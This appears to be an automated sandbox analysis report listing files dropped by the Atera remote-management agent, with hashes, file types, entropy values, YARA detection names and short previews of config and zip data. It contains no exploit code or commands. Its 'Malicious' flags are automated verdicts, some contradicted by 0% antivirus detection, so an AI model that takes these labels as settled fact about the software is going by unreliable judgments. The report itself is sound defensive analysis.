                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960711597816388
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:yBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUc:yBjk38WuBcAbwoA/BkjSHXP36RMGl
                                                                                                                                                                                                                                        MD5:25879E885A79F4548FD878EAF4A82396
                                                                                                                                                                                                                                        SHA1:AFB8D0BBD5687D2FC19C7A3FB66EA3DF1886DB8C
                                                                                                                                                                                                                                        SHA-256:3DF7B27F8649C95C56F1F68A040F29FB28EFF6756F8BA78C480DFBB541E59E4A
                                                                                                                                                                                                                                        SHA-512:39EB28B89A077D37FC8076A364B26ADFD348F6DC891AC08FACCFB071D3806C32AC0A3A5D82E8D4DE01DF6F9E1C4271CCABFA8FF7248CF6886BEF8FE4BDE51B6F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):284208
                                                                                                                                                                                                                                        Entropy (8bit):6.117274836584594
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:NZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHU:fgo0WPVTXg0
                                                                                                                                                                                                                                        MD5:66DEBCC5962642D31706EA1B067288A3
                                                                                                                                                                                                                                        SHA1:FB6A76C0E5189F66FE1D0E192349077A45BF437F
                                                                                                                                                                                                                                        SHA-256:8CBC47B453EA20F1EEA3337981A1A975A16B68B27AA156831D2B4AD0B63EA980
                                                                                                                                                                                                                                        SHA-512:5C485C7D319BA9C019FBDCA48833D3628E6D9EA6F3AABFA47A519C363BA81D11265427FD470D5D665795B010A26E751DA404DBD70895E5EAFC83CBD50D83ED2B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.676829122620627
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Ty/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqXLP:TuhMaVmzDC67EpYinAMxC5
                                                                                                                                                                                                                                        MD5:C3CBDF33261AA0BAA8C11B4D713BA911
                                                                                                                                                                                                                                        SHA1:A486A2CFA6EF16B9DD005C689C767E47BF18D5A6
                                                                                                                                                                                                                                        SHA-256:0BD8B6B5D401001A2003486077BC095A2138B42DE7A52B212BD7A4AAD72A9E35
                                                                                                                                                                                                                                        SHA-512:132600340186128C7B8EA40D77DE9E5359A52949E7EE815CF959E2000A6EE178FCE26A2AAA2EBC56A48318EEAD3038189567CD5D14F9E977780373649C83F41D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):97328
                                                                                                                                                                                                                                        Entropy (8bit):6.241615255803021
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:rNSbHB6zBedWp71O37rGMsQ5gbDnTE8iayI2Sf+Ku6JhbDEhr4WTJ7HxhP:rN3OWMsQ56vd2s+KuYc9RTJrP
                                                                                                                                                                                                                                        MD5:259DAAE7BD386F6AE1C50DEF93F9A274
                                                                                                                                                                                                                                        SHA1:70E68497781C4E7B931B11E9EFE702ECCFBC3AF7
                                                                                                                                                                                                                                        SHA-256:859758492E07C9297C1C5A0A31FA30129C23D479F442ADE01F4A51F78A0DED08
                                                                                                                                                                                                                                        SHA-512:8D25CB5982E2D8A5EFA0056C120E1BD5AEC7E28DE4DEEC9BFA2BAEBFB0FABDC4A12369F901C8415CDD3402C9A0E8F8F338C1C5E3FEB1A2C0F45ED446AB80701B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138288
                                                                                                                                                                                                                                        Entropy (8bit):6.18032959054322
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:g3XFz0qjCIPMAxlUXUKoPfw0kG71AHK7cnJ:S0qjCSRE+fw0kG71S
                                                                                                                                                                                                                                        MD5:CC3FFADF699BFB7F10A176AE306707E8
                                                                                                                                                                                                                                        SHA1:C0824E4E57FEBEF32E904E540BA369BB77ACD15A
                                                                                                                                                                                                                                        SHA-256:D48B4C4D3BED0F4662B98E557A0EDE24B6C3745E7BFFC114164A2FD33D947904
                                                                                                                                                                                                                                        SHA-512:BC648768FA54D6F9A0FB70CE88960EE2137712FD7056F8FF28D2E222871D2FFA96B97C81E21D84CD71EA336F29D28977EAB57D858B2B7D1D7C7B2B01BB455C32
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.672454142602205
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Nh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeB7f5DxmX:Ny9eEpYinAMxCA7xDxmX
                                                                                                                                                                                                                                        MD5:2BBEC1A6C6C64499CE0A4EDEA5D0C629
                                                                                                                                                                                                                                        SHA1:A1C39059B887B7A1BDF93CAB3237413D5948BE26
                                                                                                                                                                                                                                        SHA-256:D80E6D1C2A0850A2FDCA5F16A259130B08DDFE968CDC137253221CD4600D53CA
                                                                                                                                                                                                                                        SHA-512:B27639E9D30FD23461723708D4067C99AA3162FD8EF935AD5DA75776EBB46F2D11BD0FCA211BE35A195CE3020E10E063F66FDDDEAC0624392143B856DC23C174
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):384543
                                                                                                                                                                                                                                        Entropy (8bit):7.999457129580227
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:6144:QCkHWMIRwZL7gsOTLQezyUyt6ywEYUxa5FDW8mWalWh6Nxjuq0xn57/EMpx4Ip7/:x4j1ZXgsO3dU61Oa3a8O50VF/R7pwvgZ
                                                                                                                                                                                                                                        MD5:3C93B399B417B0D6A232D386E65A8B46
                                                                                                                                                                                                                                        SHA1:BB26DEAE135F405229D6F76EB6FAAEB9A3C45624
                                                                                                                                                                                                                                        SHA-256:29BC4577588116CBFEA928B2587DB3D0D26254163095E7FBBCDE6E86FD0022D7
                                                                                                                                                                                                                                        SHA-512:A963F5CF2221436938F031B65079BEA7C4BAFBD48833A9E11CD9BDD1548D68ED968D9279299AA2ADFC23311A6744D516CC50E6537AA45321E5653755ED56F149
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):177712
                                                                                                                                                                                                                                        Entropy (8bit):5.81549541154566
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:fDpvOyLSson7aezB53Pbsk4GJCMA1TSuAehsZ7f2lz8/ChoCby:fD4y07asBx4krGSeCZXH
                                                                                                                                                                                                                                        MD5:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                        SHA1:F135BE75C721AF2D5291CB463CBC22A32467084A
                                                                                                                                                                                                                                        SHA-256:36704967877E4117405BDE5EC30BEAF31E7492166714F3FFB2CEB262BF2FB571
                                                                                                                                                                                                                                        SHA-512:BD654388202CB5090C860A7229950B1184620746F4C584AB864EADE831168BC7FAE0B5E59B90165B1A9E4BA2BD154F235749718AE2DF35D3DD10403092185ED1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):546
                                                                                                                                                                                                                                        Entropy (8bit):5.048902065665432
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdG3VSQg9LNFF7ap+5v5OXrRf/2//FicYo4xm:JdASPF7NhOXrRH2/d9r
                                                                                                                                                                                                                                        MD5:158FB7D9323C6CE69D4FCE11486A40A1
                                                                                                                                                                                                                                        SHA1:29AB26F5728F6BA6F0E5636BF47149BD9851F532
                                                                                                                                                                                                                                        SHA-256:5E38EF232F42F9B0474F8CE937A478200F7A8926B90E45CB375FFDA339EC3C21
                                                                                                                                                                                                                                        SHA-512:7EEFCC5E65AB4110655E71BC282587E88242C15292D9C670885F0DAAE30FA19A4B059390EB8E934607B8B14105E3E25D7C5C1B926B6F93BDD40CBD284AAA3CEB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>...<supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhWRn:WY
                                                                                                                                                                                                                                        MD5:DC63026E80D2BB04F71E41916F807E33
                                                                                                                                                                                                                                        SHA1:6CDA386D2C365F94EA3DE41E2390FD916622EB51
                                                                                                                                                                                                                                        SHA-256:3B54D00F00AA80384DE88E4F4005E9D4D889A2CCF64B56E0C29D274352495C85
                                                                                                                                                                                                                                        SHA-512:61DA550EFD55187978872F5D8E88164A6181A11C8A720684EAA737E0846FE20B9E82B73E1F689A6585834B84C4CEE8DD949AF43E76FD0158F6CAFA704AB25183
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=37.9
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96816
                                                                                                                                                                                                                                        Entropy (8bit):6.180547422449922
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:vJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxw0h:vQUm2H5KTfOLgxFJjE50vksVUfPvC1h
                                                                                                                                                                                                                                        MD5:9D8B5941EA5B905E8197A175EF2B15A9
                                                                                                                                                                                                                                        SHA1:86A078E94B5578EC4125F50F78C8518A8CE1D086
                                                                                                                                                                                                                                        SHA-256:C6F05B647DBADC15AB97D31790FC8ACE054986EC33E9178FEEAD4235AD15CB0D
                                                                                                                                                                                                                                        SHA-512:FAB5FE82873862CE8ED1A427482093CCA307F6663E9F6497FDC244CE461312872D419FF274CDCA0C496414C28681901F335C9911B95D2A7C112D30E32D74E498
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):704560
                                                                                                                                                                                                                                        Entropy (8bit):5.954116173285503
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:i9BzaPm657wqehcZBLX+HK+kPJUQEKx07N0TCBGiBCjC0PDgM5j9FKjc33:i8m657w6ZBLmkitKqBCjC0PDgM5H
                                                                                                                                                                                                                                        MD5:BA66874C510645C1FB5FE74F85B32E98
                                                                                                                                                                                                                                        SHA1:E33C7E6991A25CC40D9E0DCC260B5A27F4A34E6C
                                                                                                                                                                                                                                        SHA-256:12D64550CB536A067D8AFFF42864836F6D41566E18F46D3CA92CB68726BDD4E9
                                                                                                                                                                                                                                        SHA-512:44E8CAA916AB98DA36AF02B84AC944FBF0A65C80B0ADBDC1A087F8ED3EFF71C750FB6116F2C12034F9F9B429D6915DB8F88511B79507CC4D063BAB40C4EAA568
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):4.667481428423969
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:hsShKC+4MsShLP6SX9NfzyShaKf0OYLCGShaKf0Od:M4qBX9Nf1YLCd
                                                                                                                                                                                                                                        MD5:5A03D90B1BF98D9BE091EFCACF2C4A23
                                                                                                                                                                                                                                        SHA1:80789C3FD5390919CBC3A559F4374CE6AD172ABF
                                                                                                                                                                                                                                        SHA-256:B3E3B0B514A57A9C8C5A8BFC882F650A625248766AAAC8260587BA367372D0BA
                                                                                                                                                                                                                                        SHA-512:94C1E8A172F3C19C926AF59C24D6E49A9950F746FF786B597CB5A714F61EA04B0C2E5A94BDCC0FD4CB8694434212C8786D905F975664D76F506FCE1CCF27CC5A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................TAgentPackageAgentInformation, Version=37.9.0.0, Culture=neutral, PublicKeyToken=null.....6AgentPackageAgentInformation.Cache.CachedDynamicFields.....<DynamicFields>k__BackingField.<Timestamp>k__BackingField..JAgentPackageAgentInformation.Api.Information.CustomField.DynamicFieldDto[]...............E.....H...............HAgentPackageAgentInformation.Api.Information.CustomField.DynamicFieldDto................................................................................................
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                        Entropy (8bit):3.9900172174899025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:X7EQTX+gkV:X7EQrMV
                                                                                                                                                                                                                                        MD5:0534512517FFE0E444A6B2B07F956041
                                                                                                                                                                                                                                        SHA1:44DC5380BFF47DE22353B58EE45119E3478B3D08
                                                                                                                                                                                                                                        SHA-256:0A84B763E40AB51F78F53D04E4266A5D6EBA887DBDD08487C570BB84370D9BDF
                                                                                                                                                                                                                                        SHA-512:47BEA241355FDC38D2C8CC3BCCC60BA14F886813DBB6FC55E20F7235393AEF64E33E44FF125B317FB3FE119DFAD786FD9DD77D8EB3F357ECB26BB2775AC1024B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.F4E48C116A2B700656969DAE6D72EA7C
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                        Entropy (8bit):3.832595074509133
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:pndoS5SNhWV:9SzWV
                                                                                                                                                                                                                                        MD5:9DBB3F219468D9FE4D379567EE56686F
                                                                                                                                                                                                                                        SHA1:D2CE07D76AB3397488009FF257438EA877DFA269
                                                                                                                                                                                                                                        SHA-256:01F344F4280755BD48E624760DEB523DBCA5ECCE454C8C2BEEA87DC8AFD88F59
                                                                                                                                                                                                                                        SHA-512:004B28CC06177962590C713C0CB6E5140FC3B5735F3CBC35A1242CD7A6216C1712267D2CE4E5F3B6DA9042A6700B56683A92D25DD1672DC2C55CA038E70D31C8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.6D6EB88CBB7752800C1CAE767D88FD30
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):310624
                                                                                                                                                                                                                                        Entropy (8bit):7.999405219212172
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:6144:EQjapzpRU64iYUQf9N4E/xWTUugwXWBoJW55fJKsff+Idm3lqd0LNIN5:EUaBXU5BjfcE5WTkwGRfQY+Om3lqdvL
                                                                                                                                                                                                                                        MD5:CB8B58765B2386EC38F32F17C7BEFCE9
                                                                                                                                                                                                                                        SHA1:6FF84B9B3884F75A3BAA40E64181AF326A1DB4C5
                                                                                                                                                                                                                                        SHA-256:2FDE849766B928C180458B200E866140C73692245C6AF9080B63992C190E80EE
                                                                                                                                                                                                                                        SHA-512:79D7A4344D1D3F3640D6847B785695F8766DB3A9D1558325B0365FD7FDD2C7AD546B2CFFC8115A4495E22B8B70DB1B845030AF54D26009628E0144F0D8925571
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....'gqX............/...AgentPackageHeartbeat/AgentPackageHeartbeat.exe....0l.......?........F0..6\.q.......<.......I.3. &.;.........O.;d.&.U....".' ..}P..u+0.`g.Z..Zq,...w.1./..UD....F.a...B=.....!.. .=... .#7A.Q..o.........+q.C5 . 1..Ud...R>n..Y.9}>z.....yE7.}!sn....p1(e.....}T#>2/..y*7.@.<..J..q......3.4....M..."/"..cS....9pT.dn.:c...&..,H.e.....r...X#...m...V..ZP......+.h.R. .8.......!7FNa.`.P;.......P~..U.x.K.D8.&.vQ!..xn..~cNG.2._L.},..........:.J...S.y..-J...K.z.H.....z.G.6....d.b.[..9......Q.r.T........#..+..b6<...p.}......!.5.&l.E..4.F8..Y...."/.b.....................(.......b..&.6...t..%.(A..X{....H4....[.....}.......n0.:.......s..wQ.&.J\|j.....7=b+.L.t.l.0.{G.Jb.Jy.U.kG.....p-...^..g.4..RA.R..........~..5t4_...Z...h..J..........t...C3....{K.h...F..W$...U....-55....Hi.......m...............x..........)...F.p....r,}}L...i:q.Y.O....`L......yY...N..J]....T..~_|.Bh..p.w%0.H.%D...p..RM`..e....TJk..(..\.%......4..N.<..^..k/_..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27696
                                                                                                                                                                                                                                        Entropy (8bit):6.448893455648887
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:TndoS4jOhWCHDIJNQnt96+aTkdMEdcG7UhZPWU1Nyb8E9VF6IYinAM+oC8Z1KTm:Td0SkSeIUhrREpYinAMxCm
                                                                                                                                                                                                                                        MD5:797C9554EC56FD72EBB3F6F6BEF67FB5
                                                                                                                                                                                                                                        SHA1:40AF8F7E72222BA9EC2EA2DD1E42FF51DC2EB1BB
                                                                                                                                                                                                                                        SHA-256:7138B6BEDA7A3F640871E232D93B4307065AB3CD9CFAC1BD7964A6BEC9E60F49
                                                                                                                                                                                                                                        SHA-512:4F461A8A25DA59F47CED0C0DBF59318DDB30C21758037E22BBAA3B03D08FF769BFD1BFC7F43F0E020DF8AE4668355AB4B9E42950DCA25435C2DD3E9A341C4A08
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):542
                                                                                                                                                                                                                                        Entropy (8bit):5.041389931890446
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGGsVZrdSJ9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdArdEtPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:547C772B1DEA0A1E8030F6ED5BE2AF75
                                                                                                                                                                                                                                        SHA1:6F4A95B2EA3342D7B4D61C715C7FC076EB6A2DC0
                                                                                                                                                                                                                                        SHA-256:C35A8B8AF7ECCB9BA68B129FF7F46EB1279229D637049F40761A697E9DFCD5A4
                                                                                                                                                                                                                                        SHA-512:0F77B35AC34C8E4655F7F1F4EBF1A86AA11F96C689E632DA8BE8A17CC69A9292878E0058DD9EA5FF7315DCDD8B34489F06E6DCBB365569E3BB80E81373792FC0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                        Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhUv:Wm
                                                                                                                                                                                                                                        MD5:27AD88A291FC97D97FD773334DE4E487
                                                                                                                                                                                                                                        SHA1:04B5DB46F05E02E2EC94B8A0A3447EA41FA4089D
                                                                                                                                                                                                                                        SHA-256:4E7F8923223CB32E5D376EBC0C5361DD97DB201848590C4877D586723142B49F
                                                                                                                                                                                                                                        SHA-512:5B21A87E19D4E3D7A14DC05C815B8D06500695360AAD1F54D2D3713CF05F646E9E7D559551BFE2CC2CDEBCE29A1991BC80AB2B11DDF79A4033897B34DCA40521
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=17.14
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):93232
                                                                                                                                                                                                                                        Entropy (8bit):6.196023578677744
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:5Svbne0Q41qJ3n8JMW+0KcBLQhZV5M+5Nn0komH7yAfRS7Hxh:5S8UMW+BV5M+5Nn0kom/RSz
                                                                                                                                                                                                                                        MD5:BD539D820C8163E9E86E59B99ADEDD22
                                                                                                                                                                                                                                        SHA1:FF367525BA06F8B9E611A82CFD57411BA4FBD1FE
                                                                                                                                                                                                                                        SHA-256:04C547E06CA956DB2B929CC2B6B695A649FF0F82C52E56F2677A887E7D9616DE
                                                                                                                                                                                                                                        SHA-512:FEBB46D70A5466C85087BD4E42FBA81682CF398739F7EFEF43982C830CCFD6FCEC4613F0B5542951A463161C891EE9F378CD4D2B15B1659DCBC0E15A34BA677F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):671744
                                                                                                                                                                                                                                        Entropy (8bit):5.893336561237734
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:fBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36Q:fBA/ZTvQD0XY0AJBSjRlXP36Q
                                                                                                                                                                                                                                        MD5:C3689CE3217DD82D57880C31B89A9437
                                                                                                                                                                                                                                        SHA1:051E913AAC2F4345D2364894C4154ABD287DB3FD
                                                                                                                                                                                                                                        SHA-256:9367CB126577146DB3B9C26DD00DD71C7B228F30C0FA6C698FAC26CAEAB14D43
                                                                                                                                                                                                                                        SHA-512:3471C18A4D79ED7C5FD268B25904EA2D6F3A15551B6517BD23ACD8ADE84FFF301492EC6C8861624E6F2699CDF9046DA2A8BAF351FB88EFC3AD4673A42AE57F7B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):833993
